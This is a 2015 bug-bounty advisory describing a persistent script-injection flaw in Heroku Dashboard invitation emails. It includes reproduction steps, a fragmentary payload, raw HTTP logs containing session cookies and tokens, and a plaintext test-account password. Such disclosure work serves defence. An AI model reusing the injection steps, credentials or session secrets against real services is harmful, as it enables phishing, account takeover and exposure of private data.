Document Title: =============== Heroku API Bug Bounty #1 - Persistent Invitation Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1300 Video: http://www.vulnerability-lab.com/get_content.php?id=1335 BugCrowd ID: e8a8ecb81b9bf115226ed2ff05937a0424da101610ba1289f027a1f8319d4eb9 Acknowledgement (Hall of Fame): https://bugcrowd.com/heroku/hall-of-fame Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2015/01/09/heroku-bug-bounty-program-2015-persistent-invitation-vulnerability Release Date: ============= 2015-01-09 Vulnerability Laboratory ID (VL-ID): ==================================== 1300 Common Vulnerability Scoring System: ==================================== 4.1 Product & Service Introduction: =============================== Heroku provides you with all the tools you need to iterate quickly, and adopt the right technologies for your project. Build modern, maintainable apps and instantly extend them with functionality from hundreds of cloud services providers without worrying about infrastructure. Build. Deploy. Scale. Heroku brings them together in an experience built and designed for developers. Scale your application by moving a slider and upgrade your database in a few simple steps. Whether your growth happens over the year or overnight, you can grow on demand to capture opportunity. Heroku (pronounced her-OH-koo) is a cloud application platform – a new way of building and deploying web apps. Our service lets app developers spend their time on their application code, not managing servers, deployment, ongoing operations, or scaling. Heroku was founded in 2007 by Orion Henry, James Lindenbaum, and Adam Wiggins. (Copy of the Vendor Homepage: https://www.heroku.com/home ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered a persistent mail encoding web vulnerability has been discovered in the official Heroku Dashboard web-application (API). Vulnerability Disclosure Timeline: ================================== 2014-08-26: Researcher Notification & Coordination (Benjamin Kunz Mejri) 2014-08-27: Vendor Notification (Heroku Security Team - Bug Bounty Program) 2014-12-03: Vendor Response/Feedback (Heroku Security Team - Bug Bounty Program) 2015-01-08: Vendor Fix/Patch Notification (Heroku Developer Team - Reward: Bug Bounty) 2015-01-09: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Heroku Product: Heroku Dashboard - Web Application (API) 2014 Q3 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A persistent mail encoding web vulnerability has been discovered in the official Heroku Dashboard Web-Application (API). The application-side issue allows remote attackers to compromise emails by injection of own malicious persistent context. The heroku dashboard impact a vulnerability inside of the invite module. After the registration with a script code payload as first- &lastname. The heroku online-service responds without secure encoded name value inside of the invitation mailing. The attacker went after the registration to the following webpage (https://dashboard.heroku.com/apps/asdsad/access) and is able to include any email to stream inside of the invitation to collaborate request own malicious script codes. The request method to inject the code by registration inside of the app service is POST. The exploitation takes place after the local attacker included another remote email to stream unauthorized malicious persistent context in outgoing emails of the heroku online-service through an invitation to collaborate. In the main emails of the registration the context of the database has been parsed in outgoing mail. The heroku dashboard access service does not encode the database context on invitations to collaborate context which results in the successful exploitation of the application-side issue. The bug typus has been declared as persistent mail encoding web vulnerability in the heroku webserver service in connection with the vulnerable application module/function. The sender email is the main heroku reply address. The bug execution occurs in the api validation of the form that allows to contact via invite other email contacts. In the Dashboard beta of heroku is the same bug in the same module/function available because only the frontend has been changed during the update. The security risk of the persistent mail encoding web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.1. Exploitation of the persistent vulnerability in the `invitation to collaborate` module requires a low privileged heroku account with low user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent redirect to external source and persistent manipulation of affected or connected module context. Request Method(s): [+] POST Vulnerable Module(s): [+] Heroku Dashboard > Apps > User[x] > Access [+] Heroku Dashboard Beta > Apps > User[x] > Access Vulnerable Function(s): [+] Invitation to Collaborate [+] Invitation Affected Module(s): [+] API Proof of Concept (PoC): ======================= The persistent mail encoding web vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the security vulnerability ... 1. Register an account with a script code payload in the first- & last-name input fields 2. Save the context and access the account 3. Register a new random app inside of the dasboard 4. Switch to the apps > access section in the regular dasboard or via beta template 5. Add any random email or heroku user account mail to the access rules and save the context Note: A notification mail arrives at the new registered access user inbox 6. The payload executes ahead to the mail mail body context because of the registered payload inside of the user profile values 7. Successful reproduce of the persistent web vulnerability! PenTest Account: bkm@evolution-sec.com User Password: chaos666 PoC: Mail Header > Source ----==_mimepart_53fe30f6c9dbf_79c5a2a6ac74767 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 7bit ">%20%20>"

--- Poc Session Logs [POST] [Invite to Collaborate] (Notification API) --- 21:26:26.784[414ms][total 414ms] Status: 302[Found] POST https://dashboard.heroku.com/apps/asdsad/access Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host [dashboard.heroku.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://dashboard.heroku.com/apps/asdsad/access] Cookie[_ga=GA1.2.1421671373.1409166519; __utma=148535982.1421671373.1409166519.1409166519.1409166519.1; __utmb=148535982.57.10.1409166519; __utmc=148535982; __utmz=148535982.1409166519.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C %22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1409166535240r0.4472799890466287; optimizelyBuckets=%7B%7D; mp_5414bf80e043619b56a936d7c7fe54d3_mixpanel=%7B%22distinct_id%22%3A%20%222014-08-27%2019%3A09%3A15%20UTC%208fc99130-104b-0132-866c-062d1b005a52%22%2C%22%24 initial_referrer%22%3A%20%22https%3A%2F%2Fdevcenter.heroku.com%2Farticles %2Fdynos%22%2C%22%24initial_referring_domain%22%3A%20%22devcenter.heroku.com%22%7D; heroku_session=1; heroku_session_nonce=0ddb0d38-d9be-4f65-82b4-19994d4222d3; _my- heroku_session=BAh7CEkiEF9jc3JmX3Rva2VuBjoGRUZJIjFVSjJjTnVhQ1MxN09nTFJ6YVYzay9lY0NRQXZaZ1FIZ0xrR2l2ZHFpcHVnPQY7AEZJIg9zZXNzaW9uX2lkBjsAVEkiJWM3MGU4YjlmYjk4MTc0Y2I5Nj MxOTU4MmRiZGFkNDE1BjsAVEkiC2luX29yZwY7AEZG-- 19be2343ca827f40ab20fc07e7093201c381af2c; user_session_secret=BAhJIgKiBUx6RmhVbmdyV0hRd1FTOHZaMEpsVEdaWVRFUnRNSEpwTXpOdVpISkxMMjkxZFRSeUwyMUpUa2gzVm04eGJtODNPV0V6YjNoSE9FUlZjV1pCTkdZd2JHOVVjVlpOUmtzM2JEZFdlV lU0YkZoMVpHSktXbXBaTUZoTFVIZExSMWx5TUhaamFtOHhWbUZ3YVdaalVXSnhUREZRVjJV Mk5IZERaMnczVlRoNE9FOTJWbE5WYldONU9XWXhlVU5LVldKU1FqZElhR1IxU25JelJVWm5XVVJ3WmxaTGNsRXZSaXR3VjBGR1RGVlFSMHBWZURoclVWTXZlVGc1YVdGdFFscDFPRkZ2UkVrMmNXdzFNRTVSWWtkWU5YS TBSSGRvUlRGWFUxQm9NMnQzTDNwd2NXTm5WakEwZURWd1IybHRablZtT0RFM2NIRjJTVlJZ U2s1V2FtcHpXWHBqVXpsTU5FeDVlV1pqV1V4cGFXbFRVVGN4UlRkdFNFNVVaRzk1TkRkVVJrWjVZV2RJU0VnNGQwdDNNa2xIY21RclNVNXBTRTR3TVVsMlJuaElSRXh6VEZSMFNTOU9WVU5UUVRZd2MxbGpNSE5NY0c1c0 5XVktZMG8xVlhKRE9Fc3diSFJCYW1FeFJuaDZhRVJLWWtaa1FtMW5NM2x0YlZneWJFVkNP VU5aVjJSeGEzRnlSbGRoVjBoMWIxZDNTWGhyWjNreWFEVlpWblJPZEZKT1NtSTRjVlJDT1dvMFEyWXZVMUU0VVdWQmEzZENUVmRoWmpsV2NGVkxiVkl3ZVU5SlVHRmpZa2hLTDJKRlVYcHVWV3R5ZFhacFJsUXZabUY2VTB FeFQxTlFRamxUTVVkblJqZDRlRFpUZHpOcGFXeHplamxsTm1JM1ZWaFdkbk5UVTBJdmEy UkxWM2hRYzJkWFlpdHRWR2RqTlRFelpYaHRiVXczVUhSc1luaHphRXh1T1UxeGFWWlZhV3hGVEdObWRtVmpMMHBKTm5oSE5rbHpibFV3VnpaS1FtSkVTWFpuTTNOaVZFSXZkVEJyYzNGUWNIQjZObHBvYUUxd2NuQnJaa0Z FWnpaQlVXMWFZVFZHV1RWaWJsUlpZa3BaYkdOc2FWQmlTWFYzTVRKVVVFVnNXSGRFYTBZ NWNHRnFObkV5TjJkSldITm5jVlkxWjJoMlRGUTRWU3RaUVU4MFEzWmpUbEZsUlU5VE4waGxiVGh5TWtvelYyOURVM1J3ZGpONlRuWmpNU3RRWkZWSllqWkVXa3RTY1c1Rk1XcFViemx6Ym5ObE5rOWpTRlIzTW01TVJIcGx abTF5V2pWemFuQnRUek5CYlRoT1prbHFaMlJOUldsVVkxWldSVFJLYVU1ak1GVldUSGxV VTNsa1VXbFRVRmh6V1VFNGVXeGxTVzh2UldrcmNpdEhWemhzVjFoTVRtdzNkMGxHUWtkb2MwRk5kazE2UVRaUksySm5hMHhzU1daYWFuaE9SbXhrTUZWU1NuVkdWWEpHUkhORVZYcDBTaXRaYTB0aU5HaHpjVm9yVTFSSmN XWmFTR3g1VTBWM1lraFROa1ZrVkhWclRUSXpRM3BFTjNCWlNraHlaMGh1VlRKRWJsWnRR elU0VTNkeFpXdDFOWFphTkZZdlZqUkViRXBSYUhCUWFtRm9ZelZRYUhOV1RYSjRVWGRyYm5RNVNXbFVSak5PUkcxV1EwNVJWR3haYm5OeVlWSmFSbFZ4VWs1RFpHTXhaVVZwTldWUlVFOXJURmhFUnpocFIzbFpUMkpCVVZ SSlVFWnhTMDlOZG1NclMwTndLekUwWmkwdFp6Sk5Zamg0TWxWVU1rUTVNVXRMVURoYWFW SldkejA5LS0yN2FiYTY5MmM1MmQxYjgxMTk0NTRjNmQyM2Q4Y2Q2YTM1YTJiZGNkBjoGRUY%3D--1a29e7f4569b51d2db15f168457ce65b8c627b9c; dashboard_session_nonce=0ddb0d38-d9be-4f65-82b4-19994d4222d3; _ga=GA1.3.1421671373.1409166519; __utma=155166509.1421671373.1409166519.1409166827.1409166827.1; __utmb=155166509.9.10.1409166827; __utmc=155166509; __utmz=155166509.1409166827.1.1.utmcsr=devcenter.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/articles/dynos; visitor_id36622=271240760; flash=%7B%7D] Connection[keep-alive] POST-Daten: utf8[%E2%9C%93] authenticity_token[UJ2cNuaCS17OgLRzaV3k%2FecCQAvZgQHgLkGivdqipug%3D] user%5Bemail%5D[bkm%40evolution-sec.com] commit [Invite] Response Header: Cache-Control[no-cache, no-store, must-revalidate] Content-Type[text/html; charset=utf-8] Date[Wed, 27 Aug 2014 19:26:46 GMT] Expires[0] Location [https://dashboard.heroku.com/apps/asdsad/access] Pragma[no-cache] Request-Id[63991fba-fbb1-492d-8b22-866fa6111cb9] Server[nginx/1.5.7] Set-Cookie[flash=%7B%22notice%22%3A%22bkm%40evolution-sec.com+has+been+added+to +the+app+asdsad.%22%7D; domain=dashboard.heroku.com; path=/; secure] status[302 Found] Strict-Transport-Security[max-age=31536000] X-Frame-Options[SAMEORIGIN] X-Rack-Cache[invalidate, pass] X-Request-Id [63991fba-fbb1-492d-8b22-866fa6111cb9] x-runtime[0.230753] x-ua-compatible[IE=Edge,chrome=1] Transfer-Encoding[chunked] Connection[keep-alive] 21:26:27.201[474ms][total 1293ms] Status: 200[OK] GET https://dashboard.heroku.com/apps/asdsad/access Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[13369] Mime Type[text/html] Request Header: Host[dashboard.heroku.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Accept-Language[de,en- US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://dashboard.heroku.com/apps/asdsad/access] Cookie[_ga=GA1.2.1421671373.1409166519; __utma=148535982.1421671373.1409166519.1409166519.1409166519.1; __utmb=148535982.57.10.1409166519; __utmc=148535982; __utmz=148535982.1409166519.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); optimizelySegments=%7B%22173438640%22%3A%22referral%22%2C%22173362769%22%3A%22ff%22%2C %22173444194%22%3A%22false%22%2C%22221602555%22%3A%22referral%22%2C%22221841254%22%3A%22ff%22%2C%22221734991%22%3A%22false%22%7D; optimizelyEndUserId=oeu1409166535240r0.4472799890466287; optimizelyBuckets=%7B%7D; mp_5414bf80e043619b56a936d7c7fe54d3_mixpanel=%7B%22distinct_id%22%3A%20%222014-08-27%2019%3A09%3A15%20UTC%208fc99130-104b-0132-866c-062d1b005a52%22%2C%22%24 initial_referrer%22%3A%20%22https%3A%2F%2Fdevcenter.heroku.com%2Farticles %2Fdynos%22%2C%22%24initial_referring_domain%22%3A%20%22devcenter.heroku.com%22%7D; heroku_session=1; heroku_session_nonce=0ddb0d38-d9be-4f65-82b4-19994d4222d3; _my- heroku_session=BAh7CEkiEF9jc3JmX3Rva2VuBjoGRUZJIjFVSjJjTnVhQ1MxN09nTFJ6YVYzay9lY0NRQXZaZ1FIZ0xrR2l2ZHFpcHVnPQY7AEZJIg9zZXNzaW9uX2lkBjsAVEkiJWM3MGU4YjlmYjk4MTc0Y2I5Nj MxOTU4MmRiZGFkNDE1BjsAVEkiC2luX29yZwY7AEZG-- 19be2343ca827f40ab20fc07e7093201c381af2c; user_session_secret=BAhJIgKiBUx6RmhVbmdyV0hRd1FTOHZaMEpsVEdaWVRFUnRNSEpwTXpOdVpISkxMMjkxZFRSeUwyMUpUa2gzVm04eGJtODNPV0V6YjNoSE9FUlZjV1pCTkdZd2JHOVVjVlpOUmtzM2JEZFdlV lU0YkZoMVpHSktXbXBaTUZoTFVIZExSMWx5TUhaamFtOHhWbUZ3YVdaalVXSnhUREZRVjJV Mk5IZERaMnczVlRoNE9FOTJWbE5WYldONU9XWXhlVU5LVldKU1FqZElhR1IxU25JelJVWm5XVVJ3WmxaTGNsRXZSaXR3VjBGR1RGVlFSMHBWZURoclVWTXZlVGc1YVdGdFFscDFPRkZ2UkVrMmNXdzFNRTVSWWtkWU5YS TBSSGRvUlRGWFUxQm9NMnQzTDNwd2NXTm5WakEwZURWd1IybHRablZtT0RFM2NIRjJTVlJZ U2s1V2FtcHpXWHBqVXpsTU5FeDVlV1pqV1V4cGFXbFRVVGN4UlRkdFNFNVVaRzk1TkRkVVJrWjVZV2RJU0VnNGQwdDNNa2xIY21RclNVNXBTRTR3TVVsMlJuaElSRXh6VEZSMFNTOU9WVU5UUVRZd2MxbGpNSE5NY0c1c05X VktZMG8xVlhKRE9Fc3diSFJCYW1FeFJuaDZhRVJLWWtaa1FtMW5NM2x0YlZneWJFVkNP VU5aVjJSeGEzRnlSbGRoVjBoMWIxZDNTWGhyWjNreWFEVlpWblJPZEZKT1NtSTRjVlJDT1dvMFEyWXZVMUU0VVdWQmEzZENUVmRoWmpsV2NGVkxiVkl3ZVU5SlVHRmpZa2hLTDJKRlVYcHVWV3R5ZFhacFJsUXZabUY2VTBF eFQxTlFRamxUTVVkblJqZDRlRFpUZHpOcGFXeHplamxsTm1JM1ZWaFdkbk5UVTBJdmEy UkxWM2hRYzJkWFlpdHRWR2RqTlRFelpYaHRiVXczVUhSc1luaHphRXh1T1UxeGFWWlZhV3hGVEdObWRtVmpMMHBKTm5oSE5rbHpibFV3VnpaS1FtSkVTWFpuTTNOaVZFSXZkVEJyYzNGUWNIQjZObHBvYUUxd2NuQnJaa0ZF WnpaQlVXMWFZVFZHV1RWaWJsUlpZa3BaYkdOc2FWQmlTWFYzTVRKVVVFVnNXSGRFYTBZ NWNHRnFObkV5TjJkSldITm5jVlkxWjJoMlRGUTRWU3RaUVU4MFEzWmpUbEZsUlU5VE4waGxiVGh5TWtvelYyOURVM1J3ZGpONlRuWmpNU3RRWkZWSllqWkVXa3RTY1c1Rk1XcFViemx6Ym5ObE5rOWpTRlIzTW01TVJIcGxab TF5V2pWemFuQnRUek5CYlRoT1prbHFaMlJOUldsVVkxWldSVFJLYVU1ak1GVldUSGxV VTNsa1VXbFRVRmh6V1VFNGVXeGxTVzh2UldrcmNpdEhWemhzVjFoTVRtdzNkMGxHUWtkb2MwRk5kazE2UVRaUksySm5hMHhzU1daYWFuaE9SbXhrTUZWU1NuVkdWWEpHUkhORVZYcDBTaXRaYTB0aU5HaHpjVm9yVTFSSmNXW mFTR3g1VTBWM1lraFROa1ZrVkhWclRUSXpRM3BFTjNCWlNraHlaMGh1VlRKRWJsWnRR elU0VTNkeFpXdDFOWFphTkZZdlZqUkViRXBSYUhCUWFtRm9ZelZRYUhOV1RYSjRVWGRyYm5RNVNXbFVSak5PUkcxV1EwNVJWR3haYm5OeVlWSmFSbFZ4VWs1RFpHTXhaVVZwTldWUlVFOXJURmhFUnpocFIzbFpUMkpCVVZSS lVFWnhTMDlOZG1NclMwTndLekUwWmkwdFp6Sk5Zamg0TWxWVU1rUTVNVXRMVURoYWFW SldkejA5LS0yN2FiYTY5MmM1MmQxYjgxMTk0NTRjNmQyM2Q4Y2Q2YTM1YTJiZGNkBjoGRUY%3D--1a29e7f4569b51d2db15f168457ce65b8c627b9c; dashboard_session_nonce=0ddb0d38-d9be-4f65-82b4-19994d4222d3; _ga=GA1.3.1421671373.1409166519; __utma=155166509.1421671373.1409166519.1409166827.1409166827.1; __utmb=155166509.9.10.1409166827; __utmc=155166509; __utmz=155166509.1409166827.1.1.utmcsr=devcenter.heroku.com|utmccn=(referral)|utmcmd=referral|utmcct=/articles/dynos; visitor_id36622=271240760; flash=%7B%22notice%22%3A%22bkm%40evolution-sec.com+has+been+added+to+the+app+asdsad.%22%7D] Connection[keep-alive] Response Header: Cache-Control[must-revalidate, no-cache, no-store, private] Content-Type[text/html; charset=utf-8] Date[Wed, 27 Aug 2014 19:26:47 GMT] Expires[0] Pragma[no-cache] Request-Id[843d1f47-560b-4a1d-881c-fb1ec07968b9] Server[nginx/1.5.7] status[200 OK] Strict- Transport-Security[max-age=31536000] X-Frame-Options[SAMEORIGIN] X-Rack-Cache[miss] X-Request-Id[843d1f47-560b-4a1d-881c-fb1ec07968b9] x-runtime[0.287221] x-ua-compatible[IE=Edge,chrome=1] Content-Length [13369] Connection[keep-alive] PoC: Invite via Dashboard Beta through Heroku API

heroku

">%20%20>"